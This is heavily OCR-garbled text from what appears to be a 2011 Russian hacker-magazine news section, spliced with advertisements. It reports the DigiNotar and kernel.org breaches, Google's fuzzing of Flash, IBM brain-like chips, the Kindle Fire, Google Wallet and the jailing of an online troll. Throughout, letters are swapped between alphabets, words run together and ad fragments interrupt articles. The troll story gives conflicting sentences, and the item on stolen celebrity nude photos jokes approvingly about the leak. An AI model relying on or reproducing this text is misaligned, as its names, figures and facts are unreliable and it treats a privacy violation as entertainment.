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Ш Мы зноем, где с мире пойти самые лучшие продукты. 

Вы знаете, что можете но йпінк родом» гкрдм^ксчіТАЗН 







Глядя на историю человечества и на все вещи, явления и про- 
цессы, которые насокружают, мне приходит в голову идея отом, 
что весь мир, созданный человеком, можно представить в виде 
большого множества логических объектов, объединяющих в себе 
все вариации и мутации в рамках одной главной Идеи. Такими 
элементами могут быть, например, «Двигатель внутреннего сго- 
рания», «Велосипед», «Процессор», «Общая теория относитель- 
ности» или «Трансплантология». 

У каждого элемента есть набор атрибутов, а самый главный 
из них — это степень «прокачан ности». Этот параметр отражает, 
насколько использован потенциал главной Идеи, которая по- 
родила этот объект. К примеру, элемент «Двигатель внутреннего 
его ран ия» сейчас прокачан уже процентов на 98: придумать что-то 
фундаментально новое в рамках идеи о работе Д ВС уже очень 
сложно. Для качественного развития двигателей и автомобилей 
нужно делать технологии, основанные на фундаментально новой 
Идее. 

Хочу сказать, что нам повезло и наша с тобой область интере- 
сов, работы идействий — это целое поле с кучей элементов, каж- 
дый из которых прокачан пока еще очень слабо и имеет огромный 
потенциал. Элементы «БезопасностьЭСАОА-систем», «Анализ 
защищенности ЕРР», «Крутой-сервис-для чего-нибудь» — прока- 
чаны процентов на 10% от их потенциала и именно здесь и сейчас 
есть огромные возможности для создания нового. 
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Разумные технологии для разумной планеты 

Что означает «27 383 операции в секунду» 
для этого счетчика электроэнергии 

Это означает, что его показания будут считываться не раз в месяц, а 24 раза в день. Потребители 
получат более детальную картину энергопотребления, а коммунальные предприятия - более 
глубокое понимание того, как используется энергия. Теперь, благодаря сотрудничеству компании 
еМеІег с ІВМ и переходу на системы Роѵѵег Зузіетз™, а также разработанные в ІВМ приложения 
и программное обеспечение для управления сервисами, коммунальные предприятия смогут 
обрабатывать данные, поступающие с более чем 20 миллионов интеллектуальных счетчиков, 
которые снимают показания каждый час, что более чем в 4 раза превышает объемы данных, 
предусмотренные отраслевыми стандартами*. Разумный бизнес требует разумного программного 
обеспечения, систем и сервисов. 



Сделаем планету разумнее. іЬт.сот/теІег/ги 
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і а 




Визуализация объема данных, 
отсылаемых счетчиком еМеІег ежегодно 



из среднестатистического дома. 



* По опубликованным результатам теста. Данные от 13 сентября 2010. ІВМ, логотип ІВМ, іЬт.сот, Роѵѵег Зузіетз и изобразительное обозначение являются товарными 
знаками Іпіегпаііопаі Визіпезз МасМпез Согрогаііоп, зарегистрированными во многих странах мира. Наименования других компаний, продуктов и услуг могут быть 
товарными знаками или знаками обслуживания третьих лиц. Список товарных знаков, зарегистрированных ІВМ на настоящий момент, представлен 
по адресу ѵѵѵѵѵѵ.іЬт.сот/ІедаІ/соруІгасІе.зІіІтІ. © 2011 Іпіегпаііопаі Визіпезз МасЫпез Согрогаііоп. Все права защищены. 
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МЕ6АІЧ ЕѴѴ5 




вышла в свет, и только за первые 
12 часов после релиза новую ОС 
скачали более 500 000 раз. 



ЕЩЕ ОДИН СКАНДАЛ 
С СЕРТИФИКАТАМИ 

ГОЛЛАНДСКИЙ ПОСТАВЩИКСЕРТИФИКАТОВ 0І6Ш0ТАК 
СМАЧНО СЕЛ В ЛУЖУ 




Для правительства 
Нидерландов не- 
приятностьситуа- 
циизаключается и 
втом,чтоОідіГ4о(аг 
донедавнихпор 
была одной из 
четырехкомпаний, 
встроенных в 
правительственную 
РКІ-инфраструктуру 
РКІоѵегЬеісІ. Теперь 
безопасность 
государственных 
сайтов можетбыть 
подугрозой. 



бсолютно несостоятельным в сфере информационной безопасности 
оказался голландский поставщик сертификатов 0 і д і N о1;а г. В не- 
котором смысле повторилась история со взломом сервера компа- 
нии СотосІ о. Атака, направленная на ОідіІ\Іо*а г, была осуществлена еще в 
июле, однако в центре сертификации попытались скрыть этот факт, сначала 
отрицая проблему, а потом заявляя, что все мошеннические сертификаты за- 
блокированы. Позже выяснилось, что был сгенерирован 531 фальшивый 55І_ 
и ЕѴ55І_ сертификат, в то время как изначально сообщалось о создании 247 
фей ко в. Злоумышленники генерировали сертификаты в течение трех дней. 
Подделки были созданы какдлякрупныхкомпаний,такихкакѴаНоо!,6оодІе, 
М 02 И Іа, М іеговой (включая сертификаты для службы ѴѴіпсІоѵѵз ІІрсЫе], 5 куре, 
Ра се Ь оо к и Тѵѵійег, так и для доменов спецслужб, например, для сайтов ЦРУ 
[ сіа.аоѵ ], МИ -6 ( зіз.аоѵ.ик ) и Моссад ( ппоззасі.аоѵ.іі і. Список пол учен благо- 
даря содействию правительства Нидерландов, которое инициировало 
проведение аудита удостоверяющего центра ОідіІМоІа г. Разработчики брау- 
зеров, разумеется, исключили0ідіІ\Іо1:а г из списка доверенных создателей 
сертификатов, а Голландские власти намерены засудить й і д і N о 1; а г, ведь на 
серверах центра сертификации не обновлялось ПО, и напрочь отсутствовало 
антивирусное ПО. Пока правительство страны временно взяло все операции, 
проводимые 0 і д і N о 1; а г, на себя. 



НЕЙРОСИНАПТИЧЕСКИЕ 
ПРОЦЕССОРЫ ОТІВМ 

РАЗРАБОТКА ЧИПОВ БУДУЩЕГО 
УЖЕ ИДЕТ ПОЛ НЫМ ХОДОМ 




сследовательскоеподразделениекорпорации ІВМ в 
сотрудничестве с рядомуниверситетов представило 
новое поколение экспериментальных компьютер- 
ных чипов, созданных для эмуляции работы головного мозга 
человека в процессе восприятия, действия и познания новой 
информации. Пока это л ишь прототипы, однако, уже рабочие. 
Новые чипы не содержат в себе каких-либо биологических 
элементов, однако обладают их свойствами. Внутри чипов 
есть та к называемое нейросинаптическое ядро, созданное 
из кремниевыхетруктури интегрированной памяти, вос- 
производящей мозговые синапсы вычислительного блока, 
имитирующего нейроны, и коммуникационной области, вос- 
производящей мозговые аксоны. Чипов пока два, и оба имеют 
ядра, созданные на базе 45-на нометровой технол огии 501- 
СМ ОБ и содержащие по 256 нейронов. Одно ядро содержит в 
себе по 262144 программируемых синапса, другое — 65536 
обучающихся синапса. В ІВМ говорят, что чипы в проведенных 
демонстрациях показали свою успешность в таких за дачах, 
как навигация, машинное видение, ассоциативная память и 
другие. В будущем на базе созданных процессоров планируют 
создавать так называемые «познающие компьютеры». 





БОЛЕЕ 350 МЛН. ОКАЧИВАНИЙ 

набрала игра Апдгу Вігсіз 
откомпанииКоѵіо МоЬМе. 
Ежедневно люди проводят 
за игрой в «Птичек» поряд- 
ка 300 млн. минут. 



ЗАМБІИ НАМЕРЕНА 
ОТКРЫТЬ ИСХОДНЫЙ КОД 

своей собственной мобиль- 
ной операционной системы 
Ьасіа. После этого использо- 
вать ОС смогут и другие про- 
изводители смартфонов. 



ВЗЛОМАН САЙТ МѴ50І..С0М, 

Хакеры попалисьбез 
выдумки:они просто пере- 
направляли посетителей 
на левый сайт и пытались 
их протроянить с помощью 
сплоитпака ВІаскЬоІе. 



В ЕЬСОМЗОРТ НАУЧИЛИСЬ 
ВЗЛАМЫВАТЬ ПАРОЛИ 
ВІ.АСКВЕККѴ, используя 
данные, хранящиеся на 
карте памяти. 7-символьный 
пароль восстанавливается 
за считанные часы. 



ВЫШЕЛ РАКАИЕІ.5 
0Е5КТ0Р 7 ДЛЯ М АС. 

Новинка может похвастаться 
более чем 90 новыми воз- 
можностями, улучшенной 
производительностью и 
многимдругим. 
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Хотите 
больше 
клиентов? 



^ОООв, 



Они уже ищут вас на Соо§Іе! 



Поиском боо^Ее ежемесячно пользуется 70% аудитории Рунета*. Сервис контекстно* 
рекламы Соо^іе ЛбѴѴогеіъ размещает рекламные объявлений рядом с результатами поисковых 
запросов пользователей. Там их смогут увидеть ваши потенциальные клиенты, когда будут искать 
информацию о ваших товарах или услугах. 



Начните рекламироваться на боо^Іе прямо сегодня просто позвоните, и мы бесплатно 
поможем создать вашу первую рекламную кампанию в бор^е АсМогйз. 



ч 8 495 780 00 22 (для Москвы) 

Ч* 8 800 ТОО-46-64 (для регионов) 



Мы работаем по будням с 9:00 до 20:00 
(по московскому времени) 



Получите подарочный сертификат на 1000 рублей на первую рекламную кампанию 
в С ооді е АсіѴѴогРб на иѵъѵѵх.ЁОО^Іе.пг/ас]иѵог{І5:/хакер 



4 По даітым гіоследаыпнр Ірь-м МеФаСІ апрели 201 1 



Со діе АсЗѴѴогсіэ 



Реклама 



МЕ6АЫЕѴѴ5 



СУТКИ НЕСЛОЖНОЙ 0005-АТАКИ СТОЯТ ДОВОЛЬНО ДЕШЕВО: примерно $50. 



ЛОМАЮТ 

ДАЖЕЗНАМЕНИТОСТЕЙ 

ХАКЕРЫ УКРАЛИУ АКТРИСЫ СКАРЛЕТТ ЙОХАНСОН ФОТО В СТИЛЕ НЮ 



«ЖЕЛЕЗНЫЕ» 

АНТИВИРУСЫ 

НЕМНОГО РАЗМЫШЛЕНИЙ ОЗАЩИТЕ БУДУЩЕГО 




каких только взломах мы не пишем на страницах ][, 
однако такого даже у нас еще не был о. Весьма 
комичная история приключилась в этом месяце поту 
сторонуАтлантики. Известная голливудская актриса Скалетт 
Йохансон внезапнообнаружила в Сети эротические фото со 
своимучастием, однако какснимки попали в Интернет — было 
загадкой. Дело в том, что фотографии Скарлеттделала сама, на 
собственный іРИопе и, разумеется, никуда их не выкладывала. 
Шокированная звезда тутже обратилась ни много ни малов 
ФБР,стребованием разобраться в происходящем безобразии. 
Компетентные люди из «органов» разобрались и сообщил и, 
что это работа хакера, который, судя по всему, специализирует- 
ся на знаменитостях. Помимо Йохансон в списке пострадавших 
также числятся более 50 звезд, среди которых Джессика Аль- 
ба, КристинаАгилера и Мила Кунис.Увсехдевушектожебыли 
украдены личные данные, видеозаписи и фотоснимки. ФБР, 
кстати, зловеще сообщает, что уже весьма близко к раскрытию 
преступления. Апока правоохранительныеорганы ищутвино- 
вных, мы, конечно, не можем прятатьоттебя прекрасное, ведь 
его на страницах нашего журнала бываеттак мал о:). 




20 

секунд 

ушлоукоманды 

Ральфа-Филиппа 

ВейнманаиВинчен- 

цоИоззо на взлом 

іРЬопеЗСБврамках 

соревнования 

Рѵѵп2оѵѵп. 



едавно компания ІпЫ совместно сМсА^ее анон- 
сировал и технологию аппаратной антивирусной 
защиты БеерЗАРЕ, которая будетреализована в 
новых моделях процессоров I піеі. Судя по всему, грядетнекая 
ап па ратная «прослойка» между процессором и операцион- 
ной системой. Были также представлены новые 22нм процес- 
соры ІѵуВгісІде и описанатехнологиязащиты отповышения 
при ви л егийБМ ЕР. 5М ЕР контрол и руетуровень привилегий 
исполняемого кода, размещенного в адресном пространстве, 
выделенном для работы программам. При активации 5М ЕР 
ап паратура анти вирусной за щиты разрешает процессору вы- 
полнять программы из этого пространства только с уровнем 
привилегий 3 — в противном случае возни кает исключение, 
и работа программы блокируется. Хотя данная аппаратура 
представлена только сейчас, в официальной документации 
Іп*еІ это решение уже нашло документальное отражение. В 
новой редакции (том ЗА, май 2011] есть полное описание ра- 
боты да иного оборудования, которого вполне достаточно для 
сторонних фирм и их разработок. Неясно пока, является ли 
ЗМЕРчастьютехнологии БеерЗАРЕ. На презентации обэтом 
не упоминал ось, и наличие двух схожих технологий в одном 
продукте маловероятно. Нелишнезаметить, что в начале года 
появиласьстатья ( ѵѵѵѵѵѵ.дірегсігіѵег.ги/посІе/3 ) с подробным 
описанием возможныхалгоритмоваппаратнойзащиты отви- 
русныхатак, причем были предоставлены работоспособные 
«виртуальные» макеты таких устройств за щиты. 





$40000 ПОТРАТИЛО РУКОВОД- 
СТВОРАСЕВООКза первые три 
недели в рамках работы про- 
граммы по выплате денежных 
вознаграждений людям, 
которые сообщают о багах на 
сайте социальной сети. Уже есть 
и свои рекордсмены — один че- 
ловек суммарно получил $7000, 
выявивбразныхуязвимостей. 

В общей сложности вознаграж- 
дениеуже успели получить 
исследователи из 16 различных 
стран. 





АВТОРМИВКЕАКМЕ.СОМ, 

известный «яблочный 
взломщик— Николас 
«Сотех»Аллегра— теперь 
будетработатьвАррІе. Нач- 
нетон с должности стажера. 




20 ЛЕТ ИСПОЛНИЛОСЬ 
ЫЫІІХ.В 1991 году21-летний 
ЛинусТорвальдс объявил 
осоздании рабочего про- 
тотипа новой операционной 
системы Ыпііх. 
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ШІ.ЕК.НОМЕ 903 

Много лет назад мы все заморачивались покупкой комьютера по частям и самостоятельно 
собирали его, посмеиваясь над производителями готовых сборок (и непременно теми, 
кто их покупает). Мол, и железо они подбирают не оптимальное, и продают втридорога. 
Романтика ЬапсІусгаЛ'а давно ушла, пришел простой расчет. Оказалось, что готовые сборки с 
установленной системой зачастую обходятся дешевле, чем собирать компьютер самому. Легче 
пойти в магазин и купить компьютер с классной конфигурацией за хорошую цену. В случае 
с ѴѴЕХІ.ЕВ.НОМЕ 903 с 64-битной ѴѴіпсІоѵѵз® 7 на борту ты получаешь практически топовую 
машину, которая идеально подойдет для игр. 





Процессор 

В качестве процессора используется мощный двухядерный процес- 
сор Іпіеі® Соге™ І5-650 с частотой 3,2 ГГц и кэш-памятью 4 Мб. СРІІ 
имеет встроенный контроллер памяти и поддерживает технологию 
ТигЬо Воозі, автоматически разгоняющую его под нагрузкой (напри- 
мер, в последних играх). Более того, такие процессоры поставляют- 
ся еще и со встроенным контроллером памяти. 

Видео 

За игровые возможности отвечают две видеокарты ОеРогсе 6ТХ 460, 
основанные на новейшей вычислительной архитектуре «Регті». 
Благодаря высокой производительности в режиме БігесіХ 11 тес- 
селяции процессор 6ТХ 460 обеспечивает идеально четкую гра- 
фику без ущерба для скорости, а поддержка технологий ІМѴЮІА ЗБ 
Ѵібіоп™, РбузХ® и США™ позволяет визуализировать все самые 
потрясающие эффекты, на которые способны компьютерные игры. 
Просто выставляй настройки графики на максимум. 

ОЗУ 

Компьютер ѴѴЕХБЕР.НОМЕ 903 укомплектован оперативной памятью 
4 Гб, работающей в двухканальном режиме. Благодаря этому работа 
с каждым из двух установленных модулей памяти осуществляется 
параллельно. Пускай технология и не дает теоретического увеличе- 
ния пропускной способности в два раза, но, тем не менее, вносит 
ощутимый результат. 



Блок питания 

Набор мощного железа не может обойтись без надежного пита- 
ния. В ѴѴЕХБЕР.НОМЕ электропитание осуществляется с помощью 
надежного блока питания мощностью 750 Вт. Это даже больше, чем 
нужно, но зато обеспечивает хороший запас надежности. 

Софт 

На всех компьютерах ѴѴЕХБЕР. НОМЕ 903 предустановлена операци- 
онная система ѴѴіпсІоѵѵз® 7 Домашняя расширенная. Использование 
именно 64-битной версии не случайно: благодаря этому удается 
задействовать все 4 Гб установленной в компьютере памяти. Помимо 
ОС, дополнительно установлен бесплатный антивирус Місгобо^® 
Зесигііу ЕзБепбаІБ и ОГГісе 2010 Зіагіег (включает в себя ограничен- 
ный функционал ѴѴогб® и Ехсеі®, для активации полнофункциональ- 
ной версии необходимо приобрести ключ продукта). 



МісгсзоП 




ѴѴіпсіоѵѵ5'7 

Домашняя расширенная 



Мы рекомендуем подлинную ОС ѴѴіпсІоѵѵз® 7. 
шсхьсг 



ЗАО «БТК» — официальный дистрибутор 
техники ѴѴЕХБЕР в России 
Единая служба поддержки ѴѴехІег: 

+7 ( 800 ) 200-9660 

ѵѵѵѵѵѵ.ѵѵехіег.ги 



© Владельцем товарного знака Місгозо^® и логотипа ѴѴіпсІоѵѵз® 7, зарегистрированных на территории США и/или других стран, и владельцем авторских прав 
на его дизайн является корпорация Місгозоіі®. 



РЕКЛАМА 




МЕ6АЫЕѴѴ5 



51 ИГРУ СДЕЛАЛАК0МАНДАРАЗРАБ0ТЧИК0В дотого, как разработала АпдгуВігйз. 



ПЛАНШЕТ АМА20Ы 
КІІ\ЮІ_ЕЕІРЕ — ОГОНЬ! 

УСПЕХИ ЧИТАЛКИ КІИОІ.Е ВДОХНОВЛЯЮТ КРУПНЕЙШИЙ СЕТЕВОЙ 
МАГАЗИН НАДАЛЬНЕЙШИЕСВЕРШЕНИЯ 

а кие только слухи не циркулировали в Сети относительно грядущего 
релиза планшетника откомпанииАта 20 п.Темнеменее,досамой 
презентации о нем не было известно практически ничего конкретно- 
го, а презентация показала, что во многом ошибались даже такие именитые 
издания, какТесНСгипсН.Итак, устройство будет работать под управлением 
Ап б гоі б, однако платформа весьма серьезно модифицирована умельцами 
Атагоп. В частности, никакого тебе Ап б гоі б М а гке* — только собственный 
магазин приложений от Ата гоп. Хорошо известно, что Атагоп не собирает- 
ся зарабатывать на самих де вайсах. Напротив, зачастую компания продает 
устройства дешевле их себестоимости, с лихвой отбивая разницу позже — на 
продаже контента. Создать универсальную сеть удобного распространения 
контента — главная цель Ата гоп. Главным пред назначением КіпсІІеРіге 
станет потребление различного мультимедийного контента: прослушивание 
музыки, чтение книг, просмотр фильмов. Для каждого из этих типов контента 
у Ата 20 п есть свой магазин. Устройство оснащено емкостным 7-дюймовым 
цветным сенсорным ІРЗ-дисплеем с разрешением 10 24 х 600 пикселей и под- 
держкой тиНИоисб. Планшет построен на двухъядерном процессореТІ ОМАР 
(1 ГГц]иоснащен8Гб встроенной памяти. Из беспроводных возможностей 
предусмотрена поддержка ѴѴі-Рі 802.11 Ь/д/п. Относительно 36 ситуация сле- 
дующая: пока, как уже было сказано выше, модель предлагается только в ѴѴі- 
Рі версии. Со гласно информации в се то го же издания ТесИСгипсИ, модифика- 
ция с ѴѴіРі+36, вероятно, появится позже. Интересно, будет ли доступна опция 
бесплатного 36 по всему миру? Есл и на обычном КіпсІІе серфить было, мягко 
говоря, неудобно (все-таки технология электронной бумаги не для этого], то 
КіпсІІеРіге готовит в этом смысле настоящий прорыв. Идея заключается в том, 
чтобы не заставлять пользователя загружать многочисленные отдельные 
элементы страниц и тратить времянаих рендеринг на самом девайсе. Ата гоп 
теперь будет выполнять рендеринг страниц на собственных серверах ЕС 2 и 
доставлять на устройства готовые изображения. По сути, Атагоп собирается 
кешировать весь Интернет и доставлять эти страницы на КіпсІІе Ріге со своих 
серверов. Эта технологию называется Атагоп 5іІк. Напоследок отмечу, что 
помимо планшета были представлены новые версии обычной читалки КіпсІІе. 
Ее теперь можно купить — держись на стуле — за $79! И хотя Атаго пне до- 
ставляет их напрямую в Россию, товар легко можно заказать через сервис ы- 
посредники вроде ѵѵѵѵѵѵ.БЫріІо.сот . 





атагопсот 

Продажи планшета КіпсІІеРіге, который Джефф Безос представил публике лично, 
стартуют 15 ноября текущего года, а предварительный заказ доступен уже сейчас. 
Цена устройства составит всего $199. 




НАШИНАЕКОРАРТУ 



В Буэнос-Айресе прошла конференция Екораг1:у — самое 
главное мероприятие для латинской Америки вобласти ИБ. 
Событие изначально носило сугубо гаражный характер и 
орга низова л ось исключительно на средства энтузиастов. Теперь же 
в конференции ежегодно участвуют более 1000 человек, а именитые 
докладчики сами выстраиваются в очередь, чтобы представить свои 
исследования на Екораг1:у. 

Спонсорами конференции регулярно выступаюттакие компании, 
как Е5ЕТ, Іттипі1:у, СОРЕ, М іеговой, боодіе, Іпіеі и Тірріпд Роіпі:. В этому 
году на концеренции было немало интересных докладов, в том числе 
и от русских парней Жени Родионова и Саши Матросова, которые рас- 
сказали о различных подходах к обходу п роверок цифровой подписи 
для модулей ядра на 64-битных версиях ѴѴіп б оѵѵз и привели примеры 
реальных вредоносных программ, использующих эти уязвимости. 

Впрочем, настоящей изюминкой конференции стал докладоб 
успешной технике атак на протокол 55І_ с названием «ВЕАЗТ». Об этой 
новой атаке ты можешь подробно прочитать в этом выпуске: если за- 
интересовался, то скорее открывай 72 страницу! 
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А51І5 рекомендует ѴѴіпсІоѵѵ$® 7. 



Когда в последний раз вы слышали 
нечто невероятное на ноутбуке? 

Больше мощности. Больше силы звука. 

Больше времени работы от батареи. 

По-настоящему невероятный ноутбук. 

Представляем новые ноутбуки А51І5 серии N 





Реклама. ІМеІ Іпзісіе, ІпіеІ Соге, ІпіеІ и логотип ІпіеІ являются товарными знаками корпорации ІпіеІ в США и других странах. 




МЕ6АЫЕѴѴ5 



ЕЩЕ 1 023 ПАТЕНТА ПРИОБРЕЛА КОМПАНИЯ СООбЬЕ У ІВМ. Патентные войны набираютобороты. 



ГРОМКИЕ ВЗЛОМЫ 
ПРОШЛОГО МЕСЯЦА 

ДЛЯ ТОРРЕНТОВ и илих ОСЕНЬ НАЧАЛАСЬ С ПРОБЛЕМ 



м 

ДгіоЬе 



БОЛВШЕ400 
УЯЗВИМОСТЕЙ 
ВАРОВЕ ЕІ_А5Н 




Проникновение хакеров на кегпеі.огд оставалось незамеченным как минимум 17 дней! Однако раз- 
работчики ядра уверены, что атакующие не могли внести скрытые изменения в код ядра. 



разу несколькими громкими ха ка ми ознаменовал ось начал о осени. 
Сначала неизвестные злоумышленники подпортили жизнь любителям 
файлообмена, взломав сайты ЬПТоггепСсот и иіоггепі.сот . Стан- 
дартные программные загрузки обоих ресурсов заменили фей ковы м антиви- 
русом, известным какЗесигі^у Збіеіб. Посетители загружали малварь вместо 
В іШоггеп*- клиентов на протяжении нескольких часов. Затем атаки обрушились 
на опенсорс-сообщество. Один за другим взлому подверглись сайты кегпеі.огд, 
ІіпихГоипбаІіоп.ог и пих.сот . В первом случае атакующим удалось получить 
гоо^-доступ к серверам, модифицировать системное ПО и организовать пере- 
хват паролей разработчиков. В частности, атаковавшие заменили орепззб- 
зегѵеги орепззб-сііепііз, а также организовали загрузку своего скрипта через 
систему инициализации. А пару не де ль спустя обнаружилось, что взломана 
также инфраструктура ІіпихГоипбаііоп.огд и социальной сети Цпих.сот . Под- 
робности взлома пока выясняются. В доступном в настоящее времятексте 
уведомления сказано, что атаки предположительно связаны между собой. Все 
серверыорганизацииІ_іпихРоипба*іоп отсоединены от Сети до завершения 
полной переустановки систем. 




ДЫРКИ ЕСТЬВЕЗДЕ,АВ0ТѴѴ0К0РКЕ55 ЕЩЕ ИУДОБНЫЙ 



14.7% ИЗ МИЛЛИОНА САМЫХ 
ПОПУЛЯРНЫХ САЙТОВ В 
МИРЕ РАБОТАЮТ НА ДВИЖ- 
КЕ ѴѴ0К0РКЕ55, СООБЩАЕТ 
НАМ ѴѴ0К0РКЕ55.0К6 



ХОРОШО ЗАНИМАТЬСЯ 
ФАЗЗИНГОМ, ЕСЛИ 
РАБОТАЕШЬ В 60061-Е 

□ овеем недавно вышло очередное обновление 

АбоЬе РІазИ (10.3.183.5), в котором было официально 
устранено ІЗуязвимостей, 12изкоторыхимеют 
характер критических проблем и позволяют организовать вы- 
полнение кода при открытии пользователем определенного 
РІазИ-контента. Зачем мы приводимздесьэтотстандартный 
репорт? Затем, дорогой читатель, что сотрудник ОоодІеТейвис 
Орман ди заявил, что все это неправда и что на самом деле в 
последнем обновлении по-тихому был о исправлено бол ее 400 
(четырехсот, это не опечатка) потенциальных уязвимостей. 

Давай разберемся, откуда Орманди взял такую цифру, 
как нашли такое количество баговипричем здесь вообще 
боодіе. Для начала стоит сказать, что Тей вис Орманди — 
личность весьма известная. К примеру, совсем недавно, 
наВІаскНаі2011,он изобличал антивирусное решение 
от компании Зорбоз. Тогда Орманди продемонстрировал 
аудитории, что в операционных системах ѴѴі п б оѵѵз Ѵізіа 
и выше модуль борьбы с эксплойтами загружается, под- 
ключается ко всем работающим процессам, но вообще 
бездействует. Также он сообщил, что большинства антиви- 
русных сигнатур не касалась рука человека, хотя Зорбоз 
заявляет обратное. Словом, ему не привыкать копаться в 
чужих программах и искать в них изъяны. 

Теперь вернемся кАбоЬе РІазб. Дел о втом, что боодіе 
поставляет РІазб-плагин в составе своего браузера СНготе. 
Сообщив миру, что компания АбоЬе кое-чего недоговаривает, 
Орманди и Кобыли вынуждены раскрытьнекоторыепод- 
робности этого дела. Оказалось, что сами сотрудники боодіе 
проинформировали АбоЬе о сотнях дыр, которые сами же их 
обнаружили спомощьюфаззинга. Размахвнутреннегоаудита, 
проведенного в боодіе, поражаетвоображение.Таккак 
недостатка в мощностях поисковый гигант не испытывает, ис- 
следователям несоставилотруда организовать грандиозное 
тестирование, для которого отобрали порядка 20.000 5ѴѴР- 
файлов. Втечениенесколькихнедельихобкатывали на РІазЬ- 
плеере в кластере из 2000 СРІІ. Участвующие в тестировании 
файлы подвергалисьопределенным мутациям (изменениям), 
создавая нештатные ситуации для выявления ошибок. В итоге 
были обнаружены сотни потенциальныхуязвимостей, вы- 
званныхвыходомза границы буфера, целочисленными пере- 
полнениями, использованием памяти послеосвобождения и 
т.п. Всеговыявлено400уникальныхсигнатур, приводящихк 
краху РІазЬ-плеера. После первичной сортировки АбоЬе они 
были зарегистрированы как 106 отдельных багов. Для исправ- 
ления данных ошибок, с учетом дублирования проблем, в код 
потребовалось внести 80 изменений. 

Так почему же об этом нигде не сообщалось? Компания 
АбоЬе все же прокомментировала ситуацию и пояснила: 
за водить С ѴЕ-отчеты о да иных ошибках не стал и, та к как, 
по мнению АбоЬе, СѴЕ отражает информацию о публично 
известных ошибках, вто время как да иные дыры были вы- 
явлены при сугубо внутреннем тестировании (5РІ_С — АбоЬе 
Зесиге Ргобисі Ьі^есусіе). АбоЬе за водит СѴЕ в двух случаях: 
при поступлении информации об уязвимости извнеипри 
исправлении гего-бау уязвимостей. Для проблем, найден- 
ных в процессе разработки продукта, СѴЕ не заводятся, 
иными словами, уязвимости исправляются молча. 
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Вт продукция -ТЕВЬЕ молочник- произведена из цельного 
(иевасстэноЕзлеііігого) молока очень высокого качества. 
Такой строгий контроль оказынаегси важным и для людей, 
заботящихся о здоровье, поскольку в последнее время не рынке появилось 
^^р^^цдОАделок и разбавлений как молоку, так и продуктов 



> 5 


|Ш 


Ді 


г іт! Чуть 






ШЬДТДМ 








МЕ6АЫЕѴѴ5 



«ЛАБОРАТОРИЯ КАСПЕРСКОГО» СТАЛА ПОСТАВЩИКОМ ЗАЩИТНЫХ ПРОГРАММ для отечественного Министерства обороны. 



6006І_ЕѴѴАІ_І_ЕТ НАЧАЛ РАБОТУ 

И ОБЕЩАЕТ ОТПРАВИТЬ НА ПОМОЙКУ ПЛАСТИКОВЫЕ КАРТЫ 



ТРОЛЛЕЙ САЖАЮТ 
ВТЮРЬМУ 



А ^51 

шау (о рау 



Тар іораужІіЬ Ш* 
ЭДазмгСз ггі® о г сКс 
Р іері Слр й. 

Г-ол іЕиюгк?* 




омпаниябоодіе официально запустила свой 
новый сервис мобильных платежей боодіе ѴѴаІІеІ: 
— мобильное приложение, с помощью которо- 
го можно оплачивать покупки в магазинах при помощи 
смартфона, посредством бесконтактной технологии 
N еа г РіеІсІ Соттипіса^іоп ( N РС) . С помощью боодіе ѴѴаІІеІ: 
пользователю для оплаты товаров и услуг нужно лишь 
приложить смартфон с ЫРС-чипом к сп ециа л ьн ому считы- 
ваю щему устройству и ввести РІЫ-код, после чего деньги 
за покупку списываются с кредитной карты. Этутехноло- 
гию многие ведущие компании рассматривают как более 
удобную альтернативу традиционным банковским картам. 
Правда, пока боодіе ѴѴаІІеІ работаеттолько в США, где вос- 
пользоваться им можно в торговых точках с платежными 
терминалами Маз^егСагсІРауРазз, которых насчитыва- 
ется около 150 тысяч. Сейчас боодіе ѴѴаІІеІ: поддерживает 
платежи только с помощью двух типов карт — кредитных 
МазІегСагсІ от банка СШ и виртуальных боодіе Ргераі б СагсІ, 
баланс которых можно пополнить с любой пластиковой 
карты. В будущем представители боодіе обещаютдо- 
бавить поддержку картѴіза, Атегісап Ехргезз и Оізсоѵег. 
Еще одно ограничение: программа в данный момент может 
работать только на смартфонах Ыехиз 346. Нов будущем 
планируется расширить поддержку на другие смартфоны 
с чипом ЫРС. 




Восновенового 
сервисалежит 
технология МРС 
(ЫеагРіеІсІСоттипі- 
саііоп), которая дает 
возможностьобмена 
данными между 
близко расположен- 
ными (несколько 
сантиметров) 
устройствами. 



СЕТЕВОЕ ТРОЯ ОЛО УЖЕ НЕ ПРОХОДИТ БЕЗНАКАЗАННО 

отя у нас в стране не п рецедента рное право, все 
равно нельзя не отметить случай произошедший 
недавно в Британии. 13 сентября британский 
суд приговорил 25-летнего англичанина ШонаДаффик 
18неделямтюрьмызажесткийтроллингв Интернете. Не 
условно. И нужно заметить, что получил тролль за дело. 

На роль мишени для своих издевок Даффи избрал 
родственников покойной Наташи Макбрайд. Девочка 15 
лет бросилась под поезд в День Святого Валентина, после 
чего ее друзья и близкие использовали ее страницу в 
РасеЬоокдля обмена соболезнованиями. Даффи незн ал 
девушку лично, апроеегибельи вовсе услышал из ново- 
стей. Тем не менее, тролль не поленился зайти в РасеЬоок 
и написать на «стене» Наташи: «я просто задремала на 
рельсах» и «мама, здесь в адужарковато». Родственники 
покойной молча терпеть не стали и сразу обратились в 
полицию, которая очень быстро отыскала «шутника». 

Тролль Даффи оказался зрелищем почти анекдотическим: 
толстым, прыщавым, живущим на пособие по безработице. 

И хотя на суде защита пыталась доказать, что «бедняга» 
страдает синдромом Аспергера и алкоголизмом, суд не 
поверил и снисхождения к троллю не проявил. Вердикт: 18 
месяцевтюрьмы и 5 летбез доступа ксоциальным сетям. 
Интересно и то, что судили Даффи по самому обычному 
обвинению — за оскорбление в особо грубой форме. Суд 
не усмотрел никакой помехи в том, что оскорбление было 
нанесено в интернете и анонимно. 






ИМУЩЕСТВОХАКЕРА 

пошло с молотка по его 
же собственной инициа- 
тиве. Все вырученные 
средства отпродажи 
недвижимости и авто- 
мобилей, оцененные в 8 
млн. рублей, были пере- 
правлены в КоуаІ Валко* 
БсоІІапсІ, пострадавший 
отхакера. Интересно, 
какую частьубытков 
он таким образом смог 
покрыть? 




СОРЦЫОООМЗ будут 
опубликованы в от- 
рытом доступе до конца 
года, сообщил глава 
компании ісІБоКѵѵаге 
Джон Кармак. 




23% ВСЕГО ВРЕМЕНИ 

в интернете западные 
юзеры проводят в соци- 
альныхсетяхи блогах, 
говорится в отчете 
компании Міеізеп. 
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ПОЧТИ 3 МЛН. КЛЮЧЕЙ К ИГРЕ ОІРТЗ СЛУЧАЙНО «ПОТЕРЯЛА» компания АМР. База утекла с сайта АМ04и.сот. 



МАЛВАРЬ ПРОЛЕЗЕТ ДАЖЕ В ВІ05 

